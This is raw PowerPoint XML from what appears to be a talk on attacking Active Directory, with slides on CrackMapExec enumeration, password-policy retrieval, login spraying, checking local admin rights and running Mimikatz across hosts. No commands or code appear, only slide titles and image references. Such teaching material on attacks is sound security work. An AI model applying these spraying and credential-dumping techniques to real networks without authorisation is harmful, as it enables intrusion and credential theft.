            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Host/Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Token usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Wmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>, PSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20033D18-C8A2-4A56-BBD5-44EA3A096680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="545228"/>
            <a:ext cx="10065434" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42628B73-DB3F-4A38-82D2-A960F8F15E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823517" y="2157493"/>
            <a:ext cx="5285625" cy="4053393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103712258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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-3961"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20033D18-C8A2-4A56-BBD5-44EA3A096680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="545228"/>
            <a:ext cx="10065434" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE03A6E4-42A0-42A7-8E90-663EBBC0C22A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1194988"/>
            <a:ext cx="12192000" cy="4873925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0272F0EA-EBB3-4AD0-A158-AF615FD3E07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2512254" y="6133898"/>
            <a:ext cx="7167489" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Retrieving Password Policy via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165876529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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-3961"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20033D18-C8A2-4A56-BBD5-44EA3A096680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="545228"/>
            <a:ext cx="10065434" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0272F0EA-EBB3-4AD0-A158-AF615FD3E07B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3019275" y="6361294"/>
            <a:ext cx="6153446" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Login Spraying + Checking Local Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E21779-850A-4B9A-84B1-3B3249D1EA0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="41427" y="1247636"/>
            <a:ext cx="12109142" cy="5054480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376692215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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-3961"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20033D18-C8A2-4A56-BBD5-44EA3A096680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4250082" y="596911"/>
            <a:ext cx="3691833" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fleek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C822373-CDB5-4F60-B454-706F87FC9808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1181686"/>
            <a:ext cx="12109142" cy="5179608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6775C071-D31F-42B4-9E6F-8429123FA36B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637762" y="6356957"/>
            <a:ext cx="3304153" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Spraying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>!?!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324580779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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393636" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Built-in Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F407D0E4-5B9C-4939-9E1A-03CD2B1D8B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484560" y="1529253"/>
            <a:ext cx="7426129" cy="5073960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256846610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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393636" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Built-in Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBBA874-A877-4296-9721-CCAA42891017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509763" y="2181270"/>
            <a:ext cx="3635828" cy="4044950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
